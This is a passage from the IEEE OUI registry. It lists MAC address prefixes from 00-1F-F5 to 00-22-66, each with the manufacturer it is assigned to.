00-1F-F5 (hex) Kongsberg Defence & Aerospace 00-1F-F6 (hex) PS Audio International 00-1F-F7 (hex) Nakajima All Precision Co., Ltd. 00-1F-F8 (hex) Siemens AG, Sector Industry, Drive Technologies, Motion Control Systems 00-1F-F9 (hex) Advanced Knowledge Associates 00-1F-FA (hex) Coretree, Co, Ltd 00-1F-FB (hex) Green Packet Bhd 00-1F-FC (hex) Riccius+Sohn GmbH 00-1F-FD (hex) Indigo Mobile Technologies Corp. 00-1F-FE (hex) ProCurve Networking by HP 00-1F-FF (hex) Respironics, Inc. 00-20-00 (hex) LEXMARK INTERNATIONAL, INC. 00-20-01 (hex) DSP SOLUTIONS, INC. 00-20-02 (hex) SERITECH ENTERPRISE CO., LTD. 00-20-03 (hex) PIXEL POWER LTD. 00-20-04 (hex) YAMATAKE-HONEYWELL CO., LTD. 00-20-05 (hex) SIMPLE TECHNOLOGY 00-20-06 (hex) GARRETT COMMUNICATIONS, INC. 00-20-07 (hex) SFA, INC. 00-20-08 (hex) CABLE & COMPUTER TECHNOLOGY 00-20-09 (hex) PACKARD BELL ELEC., INC. 00-20-0A (hex) SOURCE-COMM CORP. 00-20-0B (hex) OCTAGON SYSTEMS CORP. 00-20-0C (hex) ADASTRA SYSTEMS CORP. 00-20-0D (hex) CARL ZEISS 00-20-0E (hex) SATELLITE TECHNOLOGY MGMT, INC 00-20-0F (hex) TANBAC CO., LTD. 00-20-10 (hex) JEOL SYSTEM TECHNOLOGY CO. LTD 00-20-11 (hex) CANOPUS CO., LTD. 00-20-12 (hex) CAMTRONICS MEDICAL SYSTEMS 00-20-13 (hex) DIVERSIFIED TECHNOLOGY, INC. 00-20-14 (hex) GLOBAL VIEW CO., LTD. 00-20-15 (hex) ACTIS COMPUTER SA 00-20-16 (hex) SHOWA ELECTRIC WIRE & CABLE CO 00-20-17 (hex) ORBOTECH 00-20-18 (hex) CIS TECHNOLOGY INC. 00-20-19 (hex) OHLER GmbH 00-20-1A (hex) MRV Communications, Inc. 00-20-1B (hex) NORTHERN TELECOM/NETWORK 00-20-1C (hex) EXCEL, INC. 00-20-1D (hex) KATANA PRODUCTS 00-20-1E (hex) NETQUEST CORPORATION 00-20-1F (hex) BEST POWER TECHNOLOGY, INC. 00-20-20 (hex) MEGATRON COMPUTER INDUSTRIES PTY, LTD. 00-20-21 (hex) ALGORITHMS SOFTWARE PVT. LTD. 00-20-22 (hex) NMS Communications 00-20-23 (hex) T.C. TECHNOLOGIES PTY. LTD 00-20-24 (hex) PACIFIC COMMUNICATION SCIENCES 00-20-25 (hex) CONTROL TECHNOLOGY, INC. 00-20-26 (hex) AMKLY SYSTEMS, INC. 00-20-27 (hex) MING FORTUNE INDUSTRY CO., LTD 00-20-28 (hex) WEST EGG SYSTEMS, INC. 00-20-29 (hex) TELEPROCESSING PRODUCTS, INC. 00-20-2A (hex) N.V. DZINE 00-20-2B (hex) ADVANCED TELECOMMUNICATIONS MODULES, LTD. 00-20-2C (hex) WELLTRONIX CO., LTD. 00-20-2D (hex) TAIYO CORPORATION 00-20-2E (hex) DAYSTAR DIGITAL 00-20-2F (hex) ZETA COMMUNICATIONS, LTD. 00-20-30 (hex) ANALOG & DIGITAL SYSTEMS 00-20-31 (hex) ERTEC GmbH 00-20-32 (hex) ALCATEL TAISEL 00-20-33 (hex) SYNAPSE TECHNOLOGIES, INC. 00-20-34 (hex) ROTEC INDUSTRIEAUTOMATION GMBH 00-20-35 (hex) IBM Corp 00-20-36 (hex) BMC SOFTWARE 00-20-37 (hex) SEAGATE TECHNOLOGY 00-20-38 (hex) VME MICROSYSTEMS INTERNATIONAL CORPORATION 00-20-39 (hex) SCINETS 00-20-3A (hex) DIGITAL BI0METRICS INC. 00-20-3B (hex) WISDM LTD. 00-20-3C (hex) EUROTIME AB 00-20-3D (hex) Honeywell ECC 00-20-3E (hex) LogiCan Technologies, Inc. 00-20-3F (hex) JUKI CORPORATION 00-20-40 (hex) Motorola Broadband Communications Sector 00-20-41 (hex) DATA NET 00-20-42 (hex) DATAMETRICS CORP. 00-20-43 (hex) NEURON COMPANY LIMITED 00-20-44 (hex) GENITECH PTY LTD 00-20-45 (hex) ION Networks, Inc. 00-20-46 (hex) CIPRICO, INC. 00-20-47 (hex) STEINBRECHER CORP. 00-20-48 (hex) Marconi Communications 00-20-49 (hex) COMTRON, INC. 00-20-4A (hex) PRONET GMBH 00-20-4B (hex) AUTOCOMPUTER CO., LTD. 00-20-4C (hex) MITRON COMPUTER PTE LTD. 00-20-4D (hex) INOVIS GMBH 00-20-4E (hex) NETWORK SECURITY SYSTEMS, INC. 00-20-4F (hex) DEUTSCHE AEROSPACE AG 00-20-50 (hex) KOREA COMPUTER INC. 00-20-51 (hex) Verilink Corporation 00-20-52 (hex) RAGULA SYSTEMS 00-20-53 (hex) HUNTSVILLE MICROSYSTEMS, INC. 00-20-54 (hex) Sycamore Networks 00-20-55 (hex) ALTECH CO., LTD. 00-20-56 (hex) NEOPRODUCTS 00-20-57 (hex) TITZE DATENTECHNIK GmbH 00-20-58 (hex) ALLIED SIGNAL INC. 00-20-59 (hex) MIRO COMPUTER PRODUCTS AG 00-20-5A (hex) COMPUTER IDENTICS 00-20-5B (hex) Kentrox, LLC 00-20-5C (hex) InterNet Systems of Florida, Inc. 00-20-5D (hex) NANOMATIC OY 00-20-5E (hex) CASTLE ROCK, INC. 00-20-5F (hex) GAMMADATA COMPUTER GMBH 00-20-60 (hex) ALCATEL ITALIA S.p.A. 00-20-61 (hex) GarrettCom, Inc. 00-20-62 (hex) SCORPION LOGIC, LTD. 00-20-63 (hex) WIPRO INFOTECH LTD. 00-20-64 (hex) PROTEC MICROSYSTEMS, INC. 00-20-65 (hex) SUPERNET NETWORKING INC. 00-20-66 (hex) GENERAL MAGIC, INC. 00-20-67 (hex) PRIVATE 00-20-68 (hex) ISDYNE 00-20-69 (hex) ISDN SYSTEMS CORPORATION 00-20-6A (hex) OSAKA COMPUTER CORP. 00-20-6B (hex) KONICA MINOLTA HOLDINGS, INC. 00-20-6C (hex) EVERGREEN TECHNOLOGY CORP. 00-20-6D (hex) DATA RACE, INC. 00-20-6E (hex) XACT, INC. 00-20-6F (hex) FLOWPOINT CORPORATION 00-20-70 (hex) HYNET, LTD. 00-20-71 (hex) IBR GMBH 00-20-72 (hex) WORKLINK INNOVATIONS 00-20-73 (hex) FUSION SYSTEMS CORPORATION 00-20-74 (hex) SUNGWOON SYSTEMS 00-20-75 (hex) MOTOROLA COMMUNICATION ISRAEL 00-20-76 (hex) REUDO CORPORATION 00-20-77 (hex) KARDIOS SYSTEMS CORP. 00-20-78 (hex) RUNTOP, INC. 00-20-79 (hex) MIKRON GMBH 00-20-7A (hex) WiSE Communications, Inc. 00-20-7B (hex) Intel Corporation 00-20-7C (hex) AUTEC GmbH 00-20-7D (hex) ADVANCED COMPUTER APPLICATIONS 00-20-7E (hex) FINECOM Co., Ltd. 00-20-7F (hex) KYOEI SANGYO CO., LTD. 00-20-80 (hex) SYNERGY (UK) LTD. 00-20-81 (hex) TITAN ELECTRONICS 00-20-82 (hex) ONEAC CORPORATION 00-20-83 (hex) PRESTICOM INCORPORATED 00-20-84 (hex) OCE PRINTING SYSTEMS, GMBH 00-20-85 (hex) EXIDE ELECTRONICS 00-20-86 (hex) MICROTECH ELECTRONICS LIMITED 00-20-87 (hex) MEMOTEC, INC. 00-20-88 (hex) GLOBAL VILLAGE COMMUNICATION 00-20-89 (hex) T3PLUS NETWORKING, INC. 00-20-8A (hex) SONIX COMMUNICATIONS, LTD. 00-20-8B (hex) LAPIS TECHNOLOGIES, INC. 00-20-8C (hex) GALAXY NETWORKS, INC. 00-20-8D (hex) CMD TECHNOLOGY 00-20-8E (hex) CHEVIN SOFTWARE ENG. LTD. 00-20-8F (hex) ECI TELECOM LTD. 00-20-90 (hex) ADVANCED COMPRESSION TECHNOLOGY, INC. 00-20-91 (hex) J125, NATIONAL SECURITY AGENCY 00-20-92 (hex) CHESS ENGINEERING B.V. 00-20-93 (hex) LANDINGS TECHNOLOGY CORP. 00-20-94 (hex) CUBIX CORPORATION 00-20-95 (hex) RIVA ELECTRONICS 00-20-96 (hex) Invensys 00-20-97 (hex) APPLIED SIGNAL TECHNOLOGY 00-20-98 (hex) HECTRONIC AB 00-20-99 (hex) BON ELECTRIC CO., LTD. 00-20-9A (hex) THE 3DO COMPANY 00-20-9B (hex) ERSAT ELECTRONIC GMBH 00-20-9C (hex) PRIMARY ACCESS CORP. 00-20-9D (hex) LIPPERT AUTOMATIONSTECHNIK 00-20-9E (hex) BROWN'S OPERATING SYSTEM SERVICES, LTD. 00-20-9F (hex) MERCURY COMPUTER SYSTEMS, INC. 00-20-A0 (hex) OA LABORATORY CO., LTD. 00-20-A1 (hex) DOVATRON 00-20-A2 (hex) GALCOM NETWORKING LTD. 00-20-A3 (hex) DIVICOM INC. 00-20-A4 (hex) MULTIPOINT NETWORKS 00-20-A5 (hex) API ENGINEERING 00-20-A6 (hex) Proxim Wireless 00-20-A7 (hex) PAIRGAIN TECHNOLOGIES, INC. 00-20-A8 (hex) SAST TECHNOLOGY CORP. 00-20-A9 (hex) WHITE HORSE INDUSTRIAL 00-20-AA (hex) DIGIMEDIA VISION LTD. 00-20-AB (hex) MICRO INDUSTRIES CORP. 00-20-AC (hex) INTERFLEX DATENSYSTEME GMBH 00-20-AD (hex) LINQ SYSTEMS 00-20-AE (hex) ORNET DATA COMMUNICATION TECH. 00-20-AF (hex) 3COM CORPORATION 00-20-B0 (hex) GATEWAY DEVICES, INC. 00-20-B1 (hex) COMTECH RESEARCH INC. 00-20-B2 (hex) GKD Gesellschaft Fur Kommunikation Und Datentechnik 00-20-B3 (hex) SCLTEC COMMUNICATIONS SYSTEMS 00-20-B4 (hex) TERMA ELEKTRONIK AS 00-20-B5 (hex) YASKAWA ELECTRIC CORPORATION 00-20-B6 (hex) AGILE NETWORKS, INC. 00-20-B7 (hex) NAMAQUA COMPUTERWARE 00-20-B8 (hex) PRIME OPTION, INC. 00-20-B9 (hex) METRICOM, INC. 00-20-BA (hex) CENTER FOR HIGH PERFORMANCE 00-20-BB (hex) ZAX CORPORATION 00-20-BC (hex) Long Reach Networks Pty Ltd 00-20-BD (hex) NIOBRARA R & D CORPORATION 00-20-BE (hex) LAN ACCESS CORP. 00-20-BF (hex) AEHR TEST SYSTEMS 00-20-C0 (hex) PULSE ELECTRONICS, INC. 00-20-C1 (hex) SAXA, Inc. 00-20-C2 (hex) TEXAS MEMORY SYSTEMS, INC. 00-20-C3 (hex) COUNTER SOLUTIONS LTD. 00-20-C4 (hex) INET,INC. 00-20-C5 (hex) EAGLE TECHNOLOGY 00-20-C6 (hex) NECTEC 00-20-C7 (hex) AKAI Professional M.I. Corp. 00-20-C8 (hex) LARSCOM INCORPORATED 00-20-C9 (hex) VICTRON BV 00-20-CA (hex) DIGITAL OCEAN 00-20-CB (hex) PRETEC ELECTRONICS CORP. 00-20-CC (hex) DIGITAL SERVICES, LTD. 00-20-CD (hex) HYBRID NETWORKS, INC. 00-20-CE (hex) LOGICAL DESIGN GROUP, INC. 00-20-CF (hex) TEST & MEASUREMENT SYSTEMS INC 00-20-D0 (hex) VERSALYNX CORPORATION 00-20-D1 (hex) MICROCOMPUTER SYSTEMS (M) SDN. 00-20-D2 (hex) RAD DATA COMMUNICATIONS, LTD. 00-20-D3 (hex) OST (OUEST STANDARD TELEMATIQU 00-20-D4 (hex) CABLETRON - ZEITTNET INC. 00-20-D5 (hex) VIPA GMBH 00-20-D6 (hex) BREEZECOM 00-20-D7 (hex) JAPAN MINICOMPUTER SYSTEMS CO., Ltd. 00-20-D8 (hex) Nortel Networks 00-20-D9 (hex) PANASONIC TECHNOLOGIES, INC./MIECO-US 00-20-DA (hex) Alcatel North America ESD 00-20-DB (hex) XNET TECHNOLOGY, INC. 00-20-DC (hex) DENSITRON TAIWAN LTD. 00-20-DD (hex) Cybertec Pty Ltd 00-20-DE (hex) JAPAN DIGITAL LABORAT'Y CO.LTD 00-20-DF (hex) KYOSAN ELECTRIC MFG. CO., LTD. 00-20-E0 (hex) Actiontec Electronics, Inc. 00-20-E1 (hex) ALAMAR ELECTRONICS 00-20-E2 (hex) INFORMATION RESOURCE ENGINEERING 00-20-E3 (hex) MCD KENCOM CORPORATION 00-20-E4 (hex) HSING TECH ENTERPRISE CO., LTD 00-20-E5 (hex) APEX DATA, INC. 00-20-E6 (hex) LIDKOPING MACHINE TOOLS AB 00-20-E7 (hex) B&W NUCLEAR SERVICE COMPANY 00-20-E8 (hex) DATATREK CORPORATION 00-20-E9 (hex) DANTEL 00-20-EA (hex) EFFICIENT NETWORKS, INC. 00-20-EB (hex) CINCINNATI MICROWAVE, INC. 00-20-EC (hex) TECHWARE SYSTEMS CORP. 00-20-ED (hex) GIGA-BYTE TECHNOLOGY CO., LTD. 00-20-EE (hex) GTECH CORPORATION 00-20-EF (hex) USC CORPORATION 00-20-F0 (hex) UNIVERSAL MICROELECTRONICS CO. 00-20-F1 (hex) ALTOS INDIA LIMITED 00-20-F2 (hex) Oracle Corporation 00-20-F3 (hex) RAYNET CORPORATION 00-20-F4 (hex) SPECTRIX CORPORATION 00-20-F5 (hex) PANDATEL AG 00-20-F6 (hex) NET TEK AND KARLNET, INC. 00-20-F7 (hex) CYBERDATA CORPORATION 00-20-F8 (hex) CARRERA COMPUTERS, INC. 00-20-F9 (hex) PARALINK NETWORKS, INC. 00-20-FA (hex) GDE SYSTEMS, INC. 00-20-FB (hex) OCTEL COMMUNICATIONS CORP. 00-20-FC (hex) MATROX 00-20-FD (hex) ITV TECHNOLOGIES, INC. 00-20-FE (hex) TOPWARE INC. / GRAND COMPUTER 00-20-FF (hex) SYMMETRICAL TECHNOLOGIES 00-21-00 (hex) GemTek Technology Co., Ltd. 00-21-01 (hex) Aplicaciones Electronicas Quasar (AEQ) 00-21-02 (hex) UpdateLogic Inc. 00-21-03 (hex) GHI Electronics, LLC 00-21-04 (hex) Gigaset Communications GmbH 00-21-05 (hex) Alcatel-Lucent 00-21-06 (hex) RIM Testing Services 00-21-07 (hex) Seowonintech Co Ltd. 00-21-08 (hex) Nokia Danmark A/S 00-21-09 (hex) Nokia Danmark A/S 00-21-0A (hex) byd:sign Corporation 00-21-0B (hex) GEMINI TRAZE RFID PVT. LTD. 00-21-0C (hex) Cymtec Systems, Inc. 00-21-0D (hex) SAMSIN INNOTEC 00-21-0E (hex) Orpak Systems L.T.D. 00-21-0F (hex) Cernium Corp 00-21-10 (hex) Clearbox Systems 00-21-11 (hex) Uniphone Inc. 00-21-12 (hex) WISCOM SYSTEM CO.,LTD 00-21-13 (hex) Padtec S/A 00-21-14 (hex) Hylab Technology Inc. 00-21-15 (hex) PHYWE Systeme GmbH & Co. KG 00-21-16 (hex) Transcon Electronic Systems, spol. s r. o. 00-21-17 (hex) Tellord 00-21-18 (hex) Athena Tech, Inc. 00-21-19 (hex) Samsung Electro-Mechanics 00-21-1A (hex) LInTech Corporation 00-21-1B (hex) Cisco Systems 00-21-1C (hex) Cisco Systems 00-21-1D (hex) Dataline AB 00-21-1E (hex) Motorola Mobility, Inc. 00-21-1F (hex) SHINSUNG DELTATECH CO.,LTD. 00-21-20 (hex) Sequel Technologies 00-21-21 (hex) VRmagic GmbH 00-21-22 (hex) Chip-pro Ltd. 00-21-23 (hex) Aerosat Avionics 00-21-24 (hex) Optos Plc 00-21-25 (hex) KUK JE TONG SHIN Co.,LTD 00-21-26 (hex) Shenzhen Torch Equipment Co., Ltd. 00-21-27 (hex) TP-LINK Technology Co., Ltd. 00-21-28 (hex) Oracle Corporation 00-21-29 (hex) Cisco-Linksys, LLC 00-21-2A (hex) Audiovox Corporation 00-21-2B (hex) MSA Auer 00-21-2C (hex) SemIndia System Private Limited 00-21-2D (hex) SCIMOLEX CORPORATION 00-21-2E (hex) dresden-elektronik 00-21-2F (hex) Phoebe Micro Inc. 00-21-30 (hex) Keico Hightech Inc. 00-21-31 (hex) Blynke Inc. 00-21-32 (hex) Masterclock, Inc. 00-21-33 (hex) Building B, Inc 00-21-34 (hex) Brandywine Communications 00-21-35 (hex) ALCATEL-LUCENT 00-21-36 (hex) Motorola Mobility, Inc. 00-21-37 (hex) Bay Controls, LLC 00-21-38 (hex) Cepheid 00-21-39 (hex) Escherlogic Inc. 00-21-3A (hex) Winchester Systems Inc. 00-21-3B (hex) Berkshire Products, Inc 00-21-3C (hex) AliphCom 00-21-3D (hex) Cermetek Microelectronics, Inc. 00-21-3E (hex) TomTom 00-21-3F (hex) A-Team Technology Ltd. 00-21-40 (hex) EN Technologies Inc. Geumbok Bldg. 9F, Band-yi-dong 45-2, Songpa-gu 00-21-41 (hex) RADLIVE 00-21-42 (hex) Advanced Control Systems doo 00-21-43 (hex) Motorola Mobility, Inc. 00-21-44 (hex) SS Telecoms 00-21-45 (hex) Semptian Technologies Ltd. 00-21-46 (hex) SCI Technology 00-21-47 (hex) Nintendo Co., Ltd. 00-21-48 (hex) Kaco Solar Korea 00-21-49 (hex) China Daheng Group ,Inc. 00-21-4A (hex) Pixel Velocity, Inc 00-21-4B (hex) Shenzhen HAMP Science & Technology Co.,Ltd 00-21-4C (hex) SAMSUNG ELECTRONICS CO., LTD. 00-21-4D (hex) Guangzhou Skytone Transmission Technology Com. Ltd. 00-21-4E (hex) GS Yuasa Power Supply Ltd. 00-21-4F (hex) ALPS Electric Co., Ltd 00-21-50 (hex) EYEVIEW ELECTRONICS 00-21-51 (hex) Millinet Co., Ltd. 00-21-52 (hex) General Satellite Research & Development Limited 00-21-53 (hex) SeaMicro Inc. 00-21-54 (hex) D-TACQ Solutions Ltd 00-21-55 (hex) Cisco Systems 00-21-56 (hex) Cisco Systems 00-21-57 (hex) National Datacast, Inc. 00-21-58 (hex) Style Flying Technology Co. 00-21-59 (hex) Juniper Networks 00-21-5A (hex) Hewlett-Packard Company 00-21-5B (hex) Inotive 00-21-5C (hex) Intel Corporate 00-21-5D (hex) Intel Corporate 00-21-5E (hex) IBM Corp 00-21-5F (hex) IHSE GmbH 00-21-60 (hex) Hidea Solutions Co. Ltd. 00-21-61 (hex) Yournet Inc. 00-21-62 (hex) Nortel 00-21-63 (hex) ASKEY COMPUTER CORP 00-21-64 (hex) Special Design Bureau for Seismic Instrumentation 00-21-65 (hex) Presstek Inc. 00-21-66 (hex) NovAtel Inc. 00-21-67 (hex) HWA JIN T&I Corp. 00-21-68 (hex) iVeia, LLC 00-21-69 (hex) Prologix, LLC. 00-21-6A (hex) Intel Corporate 00-21-6B (hex) Intel Corporate 00-21-6C (hex) ODVA 00-21-6D (hex) Soltech Co., Ltd. 00-21-6E (hex) Function ATI (Huizhou) Telecommunications Co., Ltd. 00-21-6F (hex) SymCom, Inc. 00-21-70 (hex) Dell Inc 00-21-71 (hex) Wesung TNC Co., Ltd. 00-21-72 (hex) Seoultek Valley 00-21-73 (hex) Ion Torrent Systems, Inc. 00-21-74 (hex) AvaLAN Wireless 00-21-75 (hex) Pacific Satellite International Ltd. 00-21-76 (hex) YMax Telecom Ltd. 00-21-77 (hex) W. L. Gore & Associates 00-21-78 (hex) Matuschek Messtechnik GmbH 00-21-79 (hex) IOGEAR, Inc. 00-21-7A (hex) Sejin Electron, Inc. 00-21-7B (hex) Bastec AB 00-21-7C (hex) 2Wire 00-21-7D (hex) PYXIS S.R.L. 00-21-7E (hex) Telit Communication s.p.a 00-21-7F (hex) Intraco Technology Pte Ltd 00-21-80 (hex) Motorola Mobility, Inc. 00-21-81 (hex) Si2 Microsystems Limited 00-21-82 (hex) SandLinks Systems, Ltd. 00-21-83 (hex) VATECH HYDRO 00-21-84 (hex) POWERSOFT SRL 00-21-85 (hex) MICRO-STAR INT'L CO.,LTD. 00-21-86 (hex) Universal Global Scientific Industrial Co., Ltd 00-21-87 (hex) Imacs GmbH 00-21-88 (hex) EMC Corporation 00-21-89 (hex) AppTech, Inc. 00-21-8A (hex) Electronic Design and Manufacturing Company 00-21-8B (hex) Wescon Technology, Inc. 00-21-8C (hex) TopControl GMBH 00-21-8D (hex) AP Router Ind. Eletronica LTDA 00-21-8E (hex) MEKICS CO., LTD. 00-21-8F (hex) Avantgarde Acoustic Lautsprechersysteme GmbH 00-21-90 (hex) Goliath Solutions 00-21-91 (hex) D-Link Corporation 00-21-92 (hex) Baoding Galaxy Electronic Technology Co.,Ltd 00-21-93 (hex) Videofon MV 00-21-94 (hex) Ping Communication 00-21-95 (hex) GWD Media Limited 00-21-96 (hex) Telsey S.p.A. 00-21-97 (hex) ELITEGROUP COMPUTER SYSTEM 00-21-98 (hex) Thai Radio Co, LTD 00-21-99 (hex) Vacon Plc 00-21-9A (hex) Cambridge Visual Networks Ltd 00-21-9B (hex) Dell Inc 00-21-9C (hex) Honeywld Technology Corp. 00-21-9D (hex) Adesys BV 00-21-9E (hex) Sony Ericsson Mobile Communications 00-21-9F (hex) SATEL OY 00-21-A0 (hex) Cisco Systems 00-21-A1 (hex) Cisco Systems 00-21-A2 (hex) EKE-Electronics Ltd. 00-21-A3 (hex) Micromint 00-21-A4 (hex) Dbii Networks 00-21-A5 (hex) ERLPhase Power Technologies Ltd. 00-21-A6 (hex) Videotec Spa 00-21-A7 (hex) Hantle System Co., Ltd. 00-21-A8 (hex) Telephonics Corporation 00-21-A9 (hex) Mobilink Telecom Co.,Ltd 00-21-AA (hex) Nokia Danmark A/S 00-21-AB (hex) Nokia Danmark A/S 00-21-AC (hex) Infrared Integrated Systems Ltd 00-21-AD (hex) Nordic ID Oy 00-21-AE (hex) ALCATEL-LUCENT FRANCE - WTD 00-21-AF (hex) Radio Frequency Systems 00-21-B0 (hex) Tyco Telecommunications 00-21-B1 (hex) DIGITAL SOLUTIONS LTD 00-21-B2 (hex) Fiberblaze A/S 00-21-B3 (hex) Ross Controls 00-21-B4 (hex) APRO MEDIA CO., LTD 00-21-B5 (hex) Vyro Games Limited 00-21-B6 (hex) Triacta Power Technologies Inc. 00-21-B7 (hex) Lexmark International Inc. 00-21-B8 (hex) Inphi Corporation 00-21-B9 (hex) Universal Devices Inc. 00-21-BA (hex) Texas Instruments 00-21-BB (hex) Riken Keiki Co., Ltd. 00-21-BC (hex) ZALA COMPUTER 00-21-BD (hex) Nintendo Co., Ltd. 00-21-BE (hex) Cisco, Service Provider Video Technology Group 00-21-BF (hex) Hitachi High-Tech Control Systems Corporation 00-21-C0 (hex) Mobile Appliance, Inc. 00-21-C1 (hex) ABB Oy / Distribution Automation 00-21-C2 (hex) GL Communications Inc 00-21-C3 (hex) CORNELL Communications, Inc. 00-21-C4 (hex) Consilium AB 00-21-C5 (hex) 3DSP Corp 00-21-C6 (hex) CSJ Global, Inc. 00-21-C7 (hex) Russound 00-21-C8 (hex) LOHUIS Networks 00-21-C9 (hex) Wavecom Asia Pacific Limited 00-21-CA (hex) ART System Co., Ltd. 00-21-CB (hex) SMS TECNOLOGIA ELETRONICA LTDA 00-21-CC (hex) Flextronics International 00-21-CD (hex) LiveTV 00-21-CE (hex) NTC-Metrotek 00-21-CF (hex) The Crypto Group 00-21-D0 (hex) Global Display Solutions Spa 00-21-D1 (hex) Samsung Electronics Co.,Ltd 00-21-D2 (hex) Samsung Electronics Co.,Ltd 00-21-D3 (hex) BOCOM SECURITY(ASIA PACIFIC) LIMITED 00-21-D4 (hex) Vollmer Werke GmbH 00-21-D5 (hex) X2E GmbH 00-21-D6 (hex) LXI Consortium 00-21-D7 (hex) Cisco Systems 00-21-D8 (hex) Cisco Systems 00-21-D9 (hex) SEKONIC CORPORATION 00-21-DA (hex) Automation Products Group Inc. 00-21-DB (hex) Santachi Video Technology (Shenzhen) Co., Ltd. 00-21-DC (hex) TECNOALARM S.r.l. 00-21-DD (hex) Northstar Systems Corp 00-21-DE (hex) Firepro Wireless 00-21-DF (hex) Martin Christ GmbH 00-21-E0 (hex) CommAgility Ltd 00-21-E1 (hex) Nortel Networks 00-21-E2 (hex) Creative Electronic GmbH 00-21-E3 (hex) SerialTek LLC 00-21-E4 (hex) I-WIN 00-21-E5 (hex) Display Solution AG 00-21-E6 (hex) Starlight Video Limited 00-21-E7 (hex) Informatics Services Corporation 00-21-E8 (hex) Murata Manufacturing Co., Ltd. 00-21-E9 (hex) Apple, Inc 00-21-EA (hex) Bystronic Laser AG 00-21-EB (hex) ESP SYSTEMS, LLC 00-21-EC (hex) Solutronic GmbH 00-21-ED (hex) Telegesis 00-21-EE (hex) Full Spectrum Inc. 00-21-EF (hex) Kapsys 00-21-F0 (hex) EW3 Technologies LLC 00-21-F1 (hex) Tutus Data AB 00-21-F2 (hex) EASY3CALL Technology Limited 00-21-F3 (hex) Si14 SpA 00-21-F4 (hex) INRange Systems, Inc 00-21-F5 (hex) Western Engravers Supply, Inc. 00-21-F6 (hex) Oracle Corporation 00-21-F7 (hex) ProCurve Networking by HP 00-21-F8 (hex) Enseo, Inc. 00-21-F9 (hex) WIRECOM Technologies 00-21-FA (hex) A4SP Technologies Ltd. 00-21-FB (hex) LG Electronics 00-21-FC (hex) Nokia Danmark A/S 00-21-FD (hex) DSTA S.L. 00-21-FE (hex) Nokia Danmark A/S 00-21-FF (hex) Cyfrowy Polsat SA 00-22-00 (hex) IBM Corp 00-22-01 (hex) Aksys Networks Inc 00-22-02 (hex) Excito Elektronik i SkÃ¥ne AB 00-22-03 (hex) Glensound Electronics Ltd 00-22-04 (hex) KORATEK 00-22-05 (hex) WeLink Solutions, Inc. 00-22-06 (hex) Cyberdyne Inc. 00-22-07 (hex) Inteno Broadband Technology AB 00-22-08 (hex) Certicom Corp 00-22-09 (hex) Omron Healthcare Co., Ltd 00-22-0A (hex) OnLive, Inc 00-22-0B (hex) National Source Coding Center 00-22-0C (hex) Cisco Systems 00-22-0D (hex) Cisco Systems 00-22-0E (hex) Indigo Security Co., Ltd. 00-22-0F (hex) MoCA (Multimedia over Coax Alliance) 00-22-10 (hex) Motorola Mobility, Inc. 00-22-11 (hex) Rohati Systems 00-22-12 (hex) CAI Networks, Inc. 00-22-13 (hex) PCI CORPORATION 00-22-14 (hex) RINNAI KOREA 00-22-15 (hex) ASUSTek COMPUTER INC. 00-22-16 (hex) SHIBAURA VENDING MACHINE CORPORATION 00-22-17 (hex) Neat Electronics 00-22-18 (hex) Verivue Inc. 00-22-19 (hex) Dell Inc 00-22-1A (hex) Audio Precision 00-22-1B (hex) Morega Systems 00-22-1C (hex) PRIVATE 00-22-1D (hex) Freegene Technology LTD 00-22-1E (hex) Media Devices Co., Ltd. 00-22-1F (hex) eSang Technologies Co., Ltd. 00-22-20 (hex) Mitac Technology Corp 00-22-21 (hex) ITOH DENKI CO,LTD. 00-22-22 (hex) Schaffner Deutschland GmbH 00-22-23 (hex) TimeKeeping Systems, Inc. 00-22-24 (hex) Good Will Instrument Co., Ltd. 00-22-25 (hex) Thales Avionics Ltd 00-22-26 (hex) Avaak, Inc. 00-22-27 (hex) uv-electronic GmbH 00-22-28 (hex) Breeze Innovations Ltd. 00-22-29 (hex) Compumedics Ltd 00-22-2A (hex) SoundEar A/S 00-22-2B (hex) Nucomm, Inc. 00-22-2C (hex) Ceton Corp 00-22-2D (hex) SMC Networks Inc. 00-22-2E (hex) maintech GmbH 00-22-2F (hex) Open Grid Computing, Inc. 00-22-30 (hex) FutureLogic Inc. 00-22-31 (hex) SMT&C Co., Ltd. 00-22-32 (hex) Design Design Technology Ltd 00-22-33 (hex) Pirelli Broadband Solutions 00-22-34 (hex) Corventis Inc. 00-22-35 (hex) Strukton Systems bv 00-22-36 (hex) VECTOR SP. Z O.O. 00-22-37 (hex) Shinhint Group 00-22-38 (hex) LOGIPLUS 00-22-39 (hex) Indiana Life Sciences Incorporated 00-22-3A (hex) Scientific Atlanta, Cisco SPVT Group 00-22-3B (hex) Communication Networks, LLC 00-22-3C (hex) RATIO Entwicklungen GmbH 00-22-3D (hex) JumpGen Systems, LLC 00-22-3E (hex) IRTrans GmbH 00-22-3F (hex) Netgear Inc. 00-22-40 (hex) Universal Telecom S/A 00-22-41 (hex) Apple, Inc 00-22-42 (hex) Alacron Inc. 00-22-43 (hex) AzureWave Technologies, Inc. 00-22-44 (hex) Chengdu Linkon Communications Device Co., Ltd 00-22-45 (hex) Leine & Linde AB 00-22-46 (hex) Evoc Intelligent Technology Co.,Ltd. 00-22-47 (hex) DAC ENGINEERING CO., LTD. 00-22-48 (hex) Microsoft Corporation 00-22-49 (hex) HOME MULTIENERGY SL 00-22-4A (hex) RAYLASE AG 00-22-4B (hex) AIRTECH TECHNOLOGIES, INC. 00-22-4C (hex) Nintendo Co., Ltd. 00-22-4D (hex) MITAC INTERNATIONAL CORP. 00-22-4E (hex) SEEnergy Corp. 00-22-4F (hex) Byzoro Networks Ltd. 00-22-50 (hex) Point Six Wireless, LLC 00-22-51 (hex) Lumasense Technologies 00-22-52 (hex) ZOLL Lifecor Corporation 00-22-53 (hex) Entorian Technologies 00-22-54 (hex) Bigelow Aerospace 00-22-55 (hex) Cisco Systems 00-22-56 (hex) Cisco Systems 00-22-57 (hex) 3Com Europe Ltd 00-22-58 (hex) Taiyo Yuden Co., Ltd. 00-22-59 (hex) Guangzhou New Postcom Equipment Co.,Ltd. 00-22-5A (hex) Garde Security AB 00-22-5B (hex) Teradici Corporation 00-22-5C (hex) Multimedia & Communication Technology 00-22-5D (hex) Digicable Network India Pvt. Ltd. 00-22-5E (hex) Uwin Technologies Co.,LTD 00-22-5F (hex) Liteon Technology Corporation 00-22-60 (hex) AFREEY Inc. 00-22-61 (hex) Frontier Silicon Ltd 00-22-62 (hex) BEP Marine 00-22-63 (hex) Koos Technical Services, Inc. 00-22-64 (hex) Hewlett-Packard Company 00-22-65 (hex) Nokia Danmark A/S 00-22-66 (hex) Nokia Danmark A/S 00-22-67 